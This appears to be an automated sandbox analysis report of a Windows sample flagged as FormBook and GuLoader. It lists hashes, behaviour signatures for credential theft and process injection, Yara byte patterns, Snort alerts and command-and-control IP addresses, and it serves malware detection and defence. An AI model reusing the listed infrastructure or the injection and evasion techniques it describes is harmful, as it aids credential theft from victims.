Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fjerbregners_patrol.exe

Overview

General Information

Sample Name:fjerbregners_patrol.exe
Analysis ID:1289248
MD5:d7c6ba8af8325a9fc1ac197916eecfda
SHA1:0e5ed5755b2cfcbae6ff623ec1af957b43ebf75d
SHA256:f7232396a08900dcc685493ee4f510b07352492ddccac6c115b2eddced6e0e25
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • fjerbregners_patrol.exe (PID: 5656 cmdline: C:\Users\user\Desktop\fjerbregners_patrol.exe MD5: D7C6BA8AF8325A9FC1AC197916EECFDA)
    • fjerbregners_patrol.exe (PID: 3696 cmdline: C:\Users\user\Desktop\fjerbregners_patrol.exe MD5: D7C6BA8AF8325A9FC1AC197916EECFDA)
      • RAVCpl64.exe (PID: 7696 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • msdt.exe (PID: 2872 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: A9AB42610361BF6432259061737EA309)
          • explorer.exe (PID: 5308 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
          • firefox.exe (PID: 4228 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.3794736895.00000000339B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.3794736895.00000000339B0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x21d40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xcc6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.5562833277.00000000049C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.5562833277.00000000049C0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x21d40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xcc6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.5562454936.0000000004980000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 4 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.11.20104.21.62.3049727802844299 08/10/23-10:19:28.156085
        SID:2844299
        Source Port:49727
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20169.150.247.3949735802844299 08/10/23-10:19:54.432908
        SID:2844299
        Source Port:49735
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20119.18.54.5149743802844299 08/10/23-10:20:20.776722
        SID:2844299
        Source Port:49743
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.201.1.1.164729532023883 08/10/23-10:18:46.706773
        SID:2023883
        Source Port:64729
        Destination Port:53
        Protocol:UDP
        Classtype:Potentially Bad Traffic
        Timestamp:192.168.11.2096.44.182.13149721802844299 08/10/23-10:19:06.719095
        SID:2844299
        Source Port:49721
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20162.0.239.14549723802844299 08/10/23-10:19:14.774474
        SID:2844299
        Source Port:49723
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.189.114.2749738802844299 08/10/23-10:20:04.859543
        SID:2844299
        Source Port:49738
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20119.18.54.5149745802844299 08/10/23-10:20:26.111767
        SID:2844299
        Source Port:49745
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2051.79.96.11549730802844299 08/10/23-10:19:38.625827
        SID:2844299
        Source Port:49730
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20119.18.54.5149742802844299 08/10/23-10:20:18.124457
        SID:2844299
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2096.44.182.13149719802844299 08/10/23-10:19:01.344804
        SID:2844299
        Source Port:49719
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20169.150.247.3949737802844299 08/10/23-10:19:59.494375
        SID:2844299
        Source Port:49737
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2043.154.67.17049747802844299 08/10/23-10:20:39.075086
        SID:2844299
        Source Port:49747
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20104.21.62.3049726802844299 08/10/23-10:19:25.629588
        SID:2844299
        Source Port:49726
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20104.21.62.3049729802844299 08/10/23-10:19:33.218144
        SID:2844299
        Source Port:49729
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.189.114.2749741802844299 08/10/23-10:20:12.590080
        SID:2844299
        Source Port:49741
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20169.150.247.3949734802844299 08/10/23-10:19:51.900604
        SID:2844299
        Source Port:49734
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20162.0.239.14549725802844299 08/10/23-10:19:20.162362
        SID:2844299
        Source Port:49725
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20162.0.239.14549722802844299 08/10/23-10:19:12.087297
        SID:2844299
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.201.1.1.162437532023883 08/10/23-10:19:38.270347
        SID:2023883
        Source Port:62437
        Destination Port:53
        Protocol:UDP
        Classtype:Potentially Bad Traffic
        Timestamp:192.168.11.2051.79.96.11549731802844299 08/10/23-10:19:41.533492
        SID:2844299
        Source Port:49731
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20107.148.17.6749717802844299 08/10/23-10:18:48.197917
        SID:2844299
        Source Port:49717
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2051.79.96.11549733802844299 08/10/23-10:19:46.770226
        SID:2844299
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.189.114.2749739802844299 08/10/23-10:20:07.434864
        SID:2844299
        Source Port:49739
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2096.44.182.13149718802844299 08/10/23-10:18:58.663892
        SID:2844299
        Source Port:49718
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2043.154.67.17049746802844299 08/10/23-10:20:36.294109
        SID:2844299
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: fjerbregners_patrol.exeVirustotal: Detection: 32%Perma Link
        Source: fjerbregners_patrol.exeReversingLabs: Detection: 58%
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.3794736895.00000000339B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5562833277.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5562454936.0000000004980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5559916396.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: fjerbregners_patrol.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49716 version: TLS 1.2
        Source: fjerbregners_patrol.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: msdt.pdbGCTL source: fjerbregners_patrol.exe, 00000002.00000003.3700565509.00000000000A1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: fjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: fjerbregners_patrol.exe, 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3651257977.0000000033970000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3657767457.0000000033B1B000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.3747798612.0000000004DB2000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5564307473.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5564307473.000000000508D000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.3742536475.0000000004C04000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: fjerbregners_patrol.exe, fjerbregners_patrol.exe, 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3651257977.0000000033970000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3657767457.0000000033B1B000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.3747798612.0000000004DB2000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5564307473.0000000004F60000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5564307473.000000000508D000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.3742536475.0000000004C04000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: fjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: msdt.pdb source: fjerbregners_patrol.exe, 00000002.00000003.3700565509.00000000000A1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: firefox.pdb source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.4519463189.00000000082C4000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_004064FD GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004064FD
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_004063BD FindFirstFileA,FindClose,0_2_004063BD
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_004029DA FindFirstFileA,0_2_004029DA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 91.189.114.27 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 107.148.17.67 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 104.21.62.30 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 169.150.247.39 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 162.0.239.145 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 96.44.182.131 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 51.79.96.115 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 43.154.67.170 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 119.18.54.51 80Jump to behavior
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:64729 -> 1.1.1.1:53
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49717 -> 107.148.17.67:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49718 -> 96.44.182.131:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49719 -> 96.44.182.131:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49721 -> 96.44.182.131:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49722 -> 162.0.239.145:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49723 -> 162.0.239.145:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49725 -> 162.0.239.145:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49726 -> 104.21.62.30:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49727 -> 104.21.62.30:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49729 -> 104.21.62.30:80
        Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:62437 -> 1.1.1.1:53
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49730 -> 51.79.96.115:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49731 -> 51.79.96.115:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49733 -> 51.79.96.115:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49734 -> 169.150.247.39:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49735 -> 169.150.247.39:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49737 -> 169.150.247.39:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49738 -> 91.189.114.27:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49739 -> 91.189.114.27:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49741 -> 91.189.114.27:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49742 -> 119.18.54.51:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49743 -> 119.18.54.51:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49745 -> 119.18.54.51:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49746 -> 43.154.67.170:80
        Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.11.20:49747 -> 43.154.67.170:80
        Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
        Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 10 Aug 2023 08:19:00 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 10 Aug 2023 08:19:03 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
